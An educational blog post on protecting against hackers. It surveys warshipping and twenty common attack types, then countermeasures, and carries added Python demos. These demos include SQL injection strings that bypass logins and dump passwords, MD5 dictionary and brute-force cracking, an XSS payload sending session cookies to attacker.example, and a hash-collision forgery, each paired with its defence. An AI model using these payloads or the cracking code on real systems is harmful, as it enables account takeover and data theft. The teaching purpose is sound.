Knowing how to protect ourselves against hackers
A subject that concerns us all
How do we go about protecting ourselves against hackers? Well, as we indicated in our previous post, Protecting teleworkers against hackers, it all comes down to educating ourselves on cybersecurity and cyberthreats.
The more we know
The more we know about cybersecurity and the cyberthreats we all face, the better equipped we are when it comes to fending off hacking attempts.
Understanding cyberthreats
Here is a little bit of context.
What is hacking?
The definition of hacking according to the Oxford Dictionary is: the activity of using computers to get access to data in somebody else’s computer or phone system without permission.
What is a hacker?
Again, according to the Oxford Dictionary, the definition of hacker is: a person who uses computers to get access to data in somebody else's computer or phone system without permission.
There are two (2) kinds of hackers.
- There’s the White Hat hacker who is a good guy.
- Under mandate, a White Hat hacker will test your IT infrastructure and systems in order to find vulnerabilities that can be exploited, and report on them, so the appropriate measures and mechanisms can be put in place to prevent unauthorized access.
- And then there's the Black Hat hacker. This is the one we need to worry about.
- Black Hat hackers steal information for profit and/or to cause harm to their victims.
This lengthy post is all about protecting ourselves against the threat Black Hat hackers pose to everyone, every business, institution, organization, and governments in general.
Hacking and hackers have existed ever since the first computer came to be. With the arrival of the first personal computers and electronic forums such as CompuServe and Arpanet (precursor to today's Internet), the threat from hackers only increased. With the advent of the Internet that threat increased exponentially. Here's why.
Threat level?
The Internet increased the threat level we face from hackers
Take note and be aware
The World Wide Web (WWW), which most of us loosely call the Internet (strictly speaking, the Web is one service running on top of the Internet, alongside email and others), is far bigger than most people realize. Broken down in simple terms, the Web consists of:
The Surface Web
This is the Internet that we've all come to know and rely on and, in many cases, many of us use daily.
From email to social networks, from video conferencing to voice-over IP and other on-line services, no matter where you are on the planet, it connects us all in a variety of different ways.
It’s estimated the Surface Web consists of over 5,000,000,000 pages, with more being added every day.
The Deep Web
The Deep Web is much, much bigger than the Surface Web.
It consists of pages that search engines do not index, most of them because they sit behind a login and can only be reached with the proper user credentials.
Such pages include online banking, government agency portals, e-commerce account pages, corporate intranets and many other protected sites, portals and pages.
The Dark Web
The Dark Web is a section of the Internet that is deliberately hidden and can't be reached with a conventional browser and an ordinary address; it sits on overlay networks such as Tor that anonymize both the visitor and the site.
In terms of size it is actually the smallest of the three, a small corner of the Deep Web; its reputation comes from what happens there, not from how big it is.
It hosts marketplaces where stolen data, credentials, malware and other ill-gotten gains are traded every minute of every day.
Now that we have a better understanding of what the world wide web (WWW) consist of, what exactly do we have to protect ourselves against? In a word, attacks.
Hackers launch various types of attacks in the hope of gaining access to private and sensitive information that they can then turn around and use to their own benefit or sell. It goes without saying that what's to a hacker's benefit isn't going to be good for the victims!
Cyberthreats can be found almost everywhere on the internet
Contrary to what many say and believe, the Internet is still very much like the wild-wild-west of old. You have some good things going on as well as a lot of shenanigans. Some of those shenanigans are just pranks, whereas others can have some extremely severe consequences.
Hackers are constantly innovating and creating new ways to attack unsuspecting and often ill protected users. Therefore, it’s important to know what we’re up against and what to do to protect ourselves against those cyberthreats.
As the old saying goes, an ounce of prevention is better than a pound of cure. When it comes to protecting our private and confidential information, which we all have (ex: banking login credentials, credit card details, social security number, etc…), those words never rang more true!
Types of cyberattacks
There are twenty (20) common types of cyberattack that cybersecurity professionals have known about for decades.
Regardless of who and what you are, all of us need to know how to defend ourselves against them. We’ll talk about those shortly.
There is however a new form of attack that was identified in 2019 by IBM, that everyone needs to be aware of.
This new threat is called warshipping. Although it is said to have been first discussed in 2008 at a DEFCON hacker conference, only recently did it become reality.
What is warshipping?
Warshipping is a way of breaking into someone's Wi-Fi network from afar, by physically shipping a small attack device onto the premises.
Unlike wardriving, where hackers drive around with a high-gain antenna looking for wireless networks they can crack, warshipping uses inexpensive off-the-shelf components available in many electronics stores (think RadioShack or The Source in Canada) to build a single-board computer with 3G and Wi-Fi capabilities, powered by a cell phone battery.
Without going into too much detail (you can read the Infosecurity article for that), this small device can be hidden in a package delivered by the postal service, UPS, FedEx or any of the many other courier services so many of us use. Once the package reaches its destination:
- It listens to the local Wi-Fi traffic, captures what it needs (such as the handshake packets exchanged when a device joins the network) and relays it over its cellular connection to the attacker.
- If it ends up in a mail room, where it can often sit around for a long period of time, it can mount a man-in-the-middle (MITM) attack, which we outline later on: it impersonates a legitimate Wi-Fi access point and tricks users into connecting to it. Once they do, it collects their user credentials and other sensitive information which, again via its cellular connection, it sends out to the attacker.
With the captured material in hand, the hacker cracks the Wi-Fi password offline using any number of cracking resources, then uses it to join the victim's network and reach the connected devices.
IBM has demonstrated that this type of attack is real.
So, bottom line, whether you’re a corporation, a bank, a government agency, or an individual, if you have access to sensitive information that is valuable and coveted, carefully examine any and all packages you received, to make sure said package doesn’t have an uninvited guest along with the contents you expected.
Cyberattacks
Twenty (20) most common types of cyberattacks
Knowing about these threats should not be limited only to IT and cybersecurity professionals. We all need to learn more about them and how we go about protecting ourselves.
DoS and DDoS Attacks
Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks flood a system with more traffic or requests than it can handle, so that legitimate users can no longer reach it and, in the worst case, it crashes. A DDoS does the same from many machines at once (typically a botnet of infected computers), which makes it far harder to block. Attackers also use them as a smokescreen while a more targeted attack is under way.
MITM Attacks
Bottom line, a man-in-the-middle (MITM) attack is spying. It refers to an attacker placing himself between two parties (two people, networks or computers) so he can eavesdrop on, and often alter, the data they send back and forth, while each side believes it is talking directly to the other.
Phishing Attacks
More often than not, a phishing attack consists of malicious emails being made to appear as coming from legitimate sources. The intention here is to gain access to sensitive information and use that information nefariously.
Whale-phishing Attacks
Basically the same as phishing attacks BUT going after big fish such as executives and board members of Fortune 500 and Fortune 100 companies.
Spear-phishing Attacks
Again, basically the same as phishing attacks but this time targeting a very specific individual who has been extensively researched beforehand.
Ransomware
This is a type of attack that we hear and read about quite often these days.
Ransomware is malicious code that is downloaded either from a website or from an email attachment. Once it executes, it encrypts the victim's files (and frequently spreads to other systems on the same network), leaving them unusable until a ransom is paid to the attacker for the decryption key. Paying is no guarantee of getting the data back, which is one reason the backups discussed further down matter so much.
Password Attack
As the name implies, this type of attack is aimed at finding out passwords, which then allow the attacker to access the systems without raising suspicion. Password attacks range from the simple to the complex:
- The attacker can simply try to guess the password which, if it's something easy to remember like “12345678”, doesn't require much effort on the attacker's part.
- When users write their passwords on a piece of paper or a Post-it note stuck to a monitor, the attacker only has to read them off, or pay someone to do it.
- If unencrypted data circulates on your network, the attacker can intercept that traffic and grab your password.
- A user is asked to do something that requires entering his password, and a keylogger installed on the computer grabs it and sends it out to the attacker.
- Social engineering: the attacker researches the targeted individual and uses things such as birthdays, the names of a spouse, children or pets, hobbies and combinations of all of the above to guess the target's password, and/or launches a brute force attack with a small program that runs through all the possible combinations and permutations.
SQL Injection Attack
Any organization that runs a database-backed website can be hit, and since the victims include governments, financial institutions and large corporations, these attacks can have far-reaching impacts.
SQL injection, also known as SQLi, is a common attack vector in which user input is inserted into a database query without being sanitized, so that malicious SQL code manipulates the backend database and returns information that was never meant to be displayed.
This information may include any number of items, including, just to name a few,:
- Sensitive company data
- User lists
- Private customer details
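As an added example (not from the original post), here is the mechanism in code: a login check against an in-memory SQLite database, first built by gluing user input into the query string and then with a parameterised query. The table, the two users, the attack strings and the clear-text passwords are constructed for the demonstration; a real system stores salted, slow hashes.

```python
"""SQL injection, shown against an in-memory SQLite database.

Everything here is constructed for the demonstration: the table, the two
users and the attack strings. Passwords are stored in clear text only to
keep the example short; a real system stores salted, slow hashes.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create a throwaway database with a two-row users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Builds the query by string concatenation: user input becomes SQL code."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the driver sends the values separately from the
    SQL text, so a quote or comment marker in the input is just data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


# Attack strings an attacker might type into the username field (constructed).
BYPASS_ALICE = "alice' --"        # '--' comments out the password check
BYPASS_ANYONE = "' OR 1=1 --"     # makes the WHERE clause always true
DUMP_PASSWORDS = "' UNION SELECT username, password FROM users --"


def demo():
    conn = build_db()
    print("vulnerable, log in as alice without her password:",
          login_vulnerable(conn, BYPASS_ALICE, "wrong"))
    print("vulnerable, dump every password:",
          login_vulnerable(conn, DUMP_PASSWORDS, ""))
    print("safe, same bypass string:", login_safe(conn, BYPASS_ALICE, "wrong"))


if __name__ == "__main__":
    demo()
```

The `UNION` string is the one that turns a simple login bypass into a data leak: the first SELECT returns nothing, the attacker's appended SELECT returns every username and password. Parameterisation (or a query builder/ORM that does it for you) is the fix; filtering quotes out of the input is not.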
URL Interpretation
This consists of altering or fabricating URL addresses (also called URL poisoning) in order to reach the target's personal and/or professional information, or areas of a site that are meant to be inaccessible. A classic example is changing an order or account number in the address bar to see someone else's record.
DNS Spoofing
The attacker alters or spoofs Domain Name System (DNS) responses, so that users typing a legitimate address are sent to a fake website under his total control, where they are asked to enter information the attacker then grabs.
Session Hijacking
This is a MITM (man-in-the-middle) attack where the attacker takes control of an established session between the client and the server. Typically this is done by stealing or predicting the session identifier (the session cookie) and presenting it to the server, which then treats the attacker's machine as if it were the legitimate client.
Brute force attack
As mentioned previously under password attacks, this is where the attacker uses small programs (or bots) to bombard a system with guesses until the user's password is found and the intended target is accessed. Against a stolen password database the same thing is done offline, at far higher speed.
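Here is an added example, not part of the original post, that covers both the password attack and brute force attack sections above: a dictionary attack and an exhaustive digit search against stolen, unsalted MD5 hashes, followed by the two defences that blunt such attacks, a slow salted hash (PBKDF2) and an account lockout. The wordlist, the "stolen" hashes and the account are constructed for the example.

```python
"""Password guessing (dictionary and brute force) against stored hashes, and
the two defences that blunt it: slow salted hashing and login lockout.

All data is constructed: the wordlist, the 'stolen' hashes and the account.
"""
import hashlib
import hmac
import itertools
import os
import string
import time
from typing import Optional, Tuple

# Stands in for the multi-million-entry lists real attackers use.
WORDLIST = ["password", "letmein", "qwerty", "12345678", "Fluffy2015", "summer2020"]


def fast_hash(password: str) -> str:
    """Unsalted MD5, the kind of hash a badly built system might store."""
    return hashlib.md5(password.encode()).hexdigest()


def dictionary_attack(target_hash: str, wordlist) -> Optional[str]:
    """Offline attack: hash each candidate and compare with the stolen hash."""
    for candidate in wordlist:
        if fast_hash(candidate) == target_hash:
            return candidate
    return None


def brute_force_digits(target_hash: str, length: int) -> Optional[str]:
    """Exhaustive search over every all-digit password of the given length."""
    for digits in itertools.product(string.digits, repeat=length):
        candidate = "".join(digits)
        if fast_hash(candidate) == target_hash:
            return candidate
    return None


def guesses_per_second(hash_fn, seconds: float = 0.2) -> float:
    """Rough measure of how fast an attacker can test guesses with hash_fn."""
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        hash_fn(f"guess{count}")
        count += 1
    return count / seconds


# --- Defence 1: slow, salted hashing ---------------------------------------
ITERATIONS = 100_000  # raise over time as hardware gets faster


def slow_hash(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256: every guess costs the attacker ITERATIONS hashes,
    and the per-user salt defeats precomputed (rainbow) tables."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_record(password: str) -> Tuple[bytes, bytes]:
    salt = os.urandom(16)
    return salt, slow_hash(password, salt)


def verify(password: str, record: Tuple[bytes, bytes]) -> bool:
    salt, digest = record
    # constant-time comparison so timing does not leak how many bytes matched
    return hmac.compare_digest(slow_hash(password, salt), digest)


# --- Defence 2: lock the account after repeated failures -------------------
class LoginGate:
    """Online defence: after max_failures wrong passwords the account is
    locked, so guessing through the login form is no longer viable."""

    def __init__(self, record, max_failures: int = 5):
        self.record = record
        self.max_failures = max_failures
        self.failures = 0

    def attempt(self, password: str) -> str:
        if self.failures >= self.max_failures:
            return "locked"
        if verify(password, self.record):
            self.failures = 0
            return "ok"
        self.failures += 1
        return "denied"


if __name__ == "__main__":
    print("dictionary:", dictionary_attack(fast_hash("12345678"), WORDLIST))
    print("brute force, 4-digit PIN:", brute_force_digits(fast_hash("0427"), 4))
    fast = guesses_per_second(fast_hash)
    slow = guesses_per_second(lambda p: slow_hash(p, b"fixed-salt-for-demo"))
    print(f"MD5 ~{fast:,.0f} guesses/s vs PBKDF2 ~{slow:,.0f} guesses/s")
```

Run it and compare the two guess rates: the slow hash costs the attacker roughly ITERATIONS times more work per guess, which is the difference between cracking a leaked database in minutes and in years. The lockout handles the other case, guessing through the live login form, where the attacker cannot test millions of candidates anyway.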
Web Attacks
Web attacks target the websites and web applications we use every day, and the servers behind them. SQL injection, URL interpretation, session hijacking and XSS attacks, all described in this list, are web attacks.
Insider Threats
This is one of the hardest types of attacks to fight off as it comes from within. Think here of a current employee who already has access to your systems, knows a thing or two about them and, uses that knowledge to gain access to things he shouldn’t.
It could also be a computer-savvy, disgruntled ex-employee whose login credentials haven't been purged from the system (which happens more often than you think) and who remotely accesses your systems with the intention of causing harm.
Trojan Horses
Trojan horses are malicious pieces of code hidden inside software that appears legitimate; once installed, they open backdoors into your systems that hackers can then exploit.
Drive-by Attacks
This is malicious code (i.e. malware) embedded in a compromised or unsecure website. Whenever a user visits that site, the code exploits a vulnerability in the browser or one of its plug-ins and infects the user's computer, without the user having to click on anything.
XSS Attacks
Cross-site scripting (XSS) is where an attacker injects malicious script (usually JavaScript) into a website, for example through a comment field or a crafted link, in such a way that the site serves it to other visitors. Their browsers execute the script as if it came from the site itself.
With that, the attacker can steal the visitors' session cookies and log in as them, modify what the page shows, or redirect them to a site he controls.
The injected content can be as harmless as spam added to a page, but it can just as easily be code that launches phishing attacks or silently forwards credentials to the attacker.
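The following is an added example, not part of the original post, of the vulnerability itself: a comment page that pastes user input into its HTML, beside the escaped version, with a small parser-based check that tells the two apart. The payloads and the attacker host name (attacker.example) are constructed placeholders.

```python
"""Cross-site scripting (XSS): a comment page that echoes user input into
HTML without escaping, beside the fixed version.

The payloads and the attacker host name are constructed placeholders.
"""
import html
from html.parser import HTMLParser

# What an attacker posts as a 'comment'. The second one ships the visitor's
# session cookie to a host the attacker controls; the third breaks out of an
# attribute value instead of element content.
PAYLOAD_ALERT = "<script>alert('xss')</script>"
PAYLOAD_COOKIE = (
    "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
)
PAYLOAD_ATTR = '" onmouseover="alert(1)'


def render_unsafe(comment: str, author: str) -> str:
    """Vulnerable: the stored comment is pasted straight into the page."""
    return f'<div class="comment" data-author="{author}"><p>{comment}</p></div>'


def render_safe(comment: str, author: str) -> str:
    """Fixed: escape for the context the data lands in. html.escape with
    quote=True covers both element content and quoted attribute values."""
    safe_author = html.escape(author, quote=True)
    safe_comment = html.escape(comment, quote=True)
    return f'<div class="comment" data-author="{safe_author}"><p>{safe_comment}</p></div>'


class ScriptFinder(HTMLParser):
    """Walks the rendered HTML and records anything a browser would execute:
    <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")


def executable_parts(fragment: str) -> list:
    """Return the executable pieces found in a rendered HTML fragment
    (empty list means the input was rendered as inert text)."""
    finder = ScriptFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for comment, author in [(PAYLOAD_ALERT, "mallory"), ("hello", PAYLOAD_ATTR)]:
        print("unsafe:", executable_parts(render_unsafe(comment, author)))
        print("safe:  ", executable_parts(render_safe(comment, author)))
```

The parser check is only there to contrast the two renderers; it is not a filter to ship. The fix is output encoding matched to the context (element body, attribute, URL, script), done by the template engine, with a Content-Security-Policy header as defence in depth.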
Eavesdropping Attacks
As the name implies, this type of attack consists of waiting silently and grabbing whatever login credentials, credit card information and other private and sensitive details circulate on an unsecured, unencrypted network. It can be either passive or active.
- Passive eavesdropping is where the hacker only listens in (for example on open Wi-Fi) and grabs whatever information he needs.
- Active eavesdropping is where the hacker first tampers with the network, for instance by spoofing an access point or a router, so that the traffic is routed through a point he controls and can be collected for analysis at will.
Birthday attacks
This attack abuses the mathematics behind hash functions, which digital signatures and message authentication rely on: a signature is computed over the hash of a message, not over the message itself. Because of the so-called birthday paradox, an attacker needs only about 2^(n/2) attempts, not 2^n, to find two different inputs with the same n-bit hash. If he can craft a harmless message and a malicious one that hash to the same value, he gets the victim to sign the harmless one and then substitutes the malicious one; the receiving device, checking only the hash, won't be the wiser. This is why short hashes, and broken ones such as MD5 and SHA-1, must not be used for signatures.
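As an added example that is not part of the original post, the code below makes the 2^(n/2) figure concrete on SHA-256 truncated to 32 bits (standing in for a short or weak hash; the full 256 bits are far out of reach), then carries out the document substitution just described with a two-set birthday search. The toy "contracts" are constructed for the example.

```python
"""Birthday attack on a short hash: how quickly collisions appear, and how an
attacker turns a collision into a substituted document.

Everything is constructed: the 'short hash' is SHA-256 truncated to a few bits
(a real 256-bit hash needs ~2^128 work), the documents are toy contracts.
"""
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """SHA-256 truncated to `bits` bits, standing in for a weak/short hash."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def expected_attempts(bits: int) -> float:
    """Birthday bound: about sqrt(pi/2 * 2^bits) random inputs give a
    collision, rather than the 2^bits a search of the whole space needs."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_collision(bits: int, prefix: bytes = b"msg-"):
    """Hash numbered messages until two share a truncated hash.
    Returns (message_a, message_b, attempts)."""
    seen = {}
    counter = 0
    while True:
        msg = prefix + counter.to_bytes(8, "big")
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, counter + 1
        seen[h] = msg
        counter += 1


def whitespace_suffix(n: int, width: int = 32) -> bytes:
    """Encode n as a trailing run of spaces/tabs, a change most readers and
    parsers never notice. Used to make many 'identical' document variants."""
    return bytes(0x20 if (n >> k) & 1 == 0 else 0x09 for k in range(width))


def forge(bits: int, benign: bytes, malicious: bytes, table_size: int = 1 << 16):
    """Two-set birthday attack. Build table_size variants of the benign
    document, then try malicious variants until one hashes into the table.
    The victim signs the benign variant; the attacker swaps in the malicious
    one, and a verifier that checks only the short hash accepts it."""
    table = {}
    for i in range(table_size):
        doc = benign + whitespace_suffix(i)
        table[truncated_hash(doc, bits)] = doc
    j = 0
    while True:
        doc = malicious + whitespace_suffix(j)
        h = truncated_hash(doc, bits)
        if h in table:
            return table[h], doc
        j += 1


if __name__ == "__main__":
    a, b, n = find_collision(32)
    print(f"32-bit collision after {n:,} attempts (expected ~{expected_attempts(32):,.0f})")
    good, bad = forge(32, b"Pay Alice $10", b"Pay Alice $10000")
    print(good.rstrip(), bad.rstrip(),
          truncated_hash(good, 32) == truncated_hash(bad, 32))
```

With 32 bits the collision turns up after tens of thousands of hashes, in well under a second; the same code against a 64-bit hash would already need billions, and against the full SHA-256 it is hopeless, which is exactly the margin a signature scheme depends on.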
Malware Attack
Malware (malicious software) is the common thread running through many of the attacks already described. Several of them are, in practice, ways of delivering it:
- MITM attacks,
- phishing,
- ransomware,
- SQL injection,
- Trojan horses,
- drive-by attacks, and
- XSS attacks.
Typical ways a computer ends up infected include:
- Visiting a malicious or compromised website that served code to the user's browser (drive-by or XSS attack).
- Installing software that had malicious code hidden in it (Trojan horse attack).
- Clicking on a malicious link in an email (phishing attack) that sent the user to a malicious site.
- Opening an email attachment (phishing attack) that contained malicious code which installed itself on the user's computer.
Cybersecurity
Cybersecurity concerns us all
Basic countermeasures
Going back to our previous post on Protecting teleworkers against hackers and as stated earlier herein, it all starts with educating users. Which is what this post is all about.
This being said, the basic measures we can all take to protect ourselves against hackers are:
- Installing a reliable Internet security software that also includes a firewall on all your connected devices.
- Software packages like Norton 360, Kaspersky internet security, Panda Dome Advanced for example will address those.
- Use strong passwords that are hard to guess and therefore to crack, and a different one for every account, so that one leaked password doesn't open all your doors.
- If you have too many passwords and it’s hard for you to remember them, many security software packages have a secure password manager you can use to store your credentials.
- Monitor intrusion attempts.
- Again, many security software packages have that capability and send alerts whenever an intrusion attempt is detected and blocked.
- Make sure all the updates, upgrades and patches for your operating system, applications and Internet security software are installed as soon as they are released; turn on automatic updates wherever the option exists.
- Talk about and repeat often that cybersecurity is not to be taken lightly. The more people are aware and taking appropriate measures, the more secure we all are.
Advanced countermeasures
If you are a business or any kind of large organization, there are additional measures that can be put in place to enhance security and prevent your information from ending up in the wrong hands. Such measure include:
- Controlling access. This can include:
- Controlling physical access to premises and computer network infrastructures.
- Using application controls to restrict user access to data and services.
- Controlling the ports on computers connected to your network, so that no external device (ex: USB key) can be used to copy data onto something the user can then carry out the door.
- Have content filtering security software and / or appliance to filter out malicious emails, attachments and websites
- Use a firewall appliance to protect your network from the outside world and to separate the internal sections of your network from each other.
- Use virtual private networks (VPNs) to provide secure and authorized remote access.
- Also provide VPN clients to your users. This will enable them to securely access your company's IT resources from remote locations.
- Have a local backup solution in place that is complemented by a cloud backup service. Our article on Local and cloud computing illustrates how these two (2) technologies complement each other, as well as the importance of having hybrid infrastructures in place.
- If all your information is gone or corrupted after being the victim of a hack, your backup will enable you to restore your information.
- Make sure you back up your data daily, and test now and then that the backups can actually be restored. In so doing, should something severe happen, you can do a complete restore of your data, which means you may lose only a few hours of work as opposed to days, weeks or even longer!
Once all these measures are in place, it will be much harder for anyone to steal your valuable information. HOWEVER, you should also consider using the services of a White Hat hacker to confirm that everything really is secure.
A White Hat hacker will perform an ethical hacking mandate, which includes intrusion attempts (commonly referred to as penetration testing), and provide you with a report of his findings.
If vulnerabilities were found, that report will also include a list of recommendations and measures that can be taken to remedy the situation.
Conclusion
You and your data are now better protected
There you have it. You can now rest a little easier, knowing that you've done what needs to be done today to keep your private and confidential information safe.
HOWEVER, just bear in mind that as stated earlier, hackers are constantly innovating and coming up with new ways to get access to things they shouldn’t have.
That means cybersecurity and protecting against cyberthreats is an ongoing process, one that none of us can overlook.
We must all be vigilant and keep the measures in place up to date and up to par as well.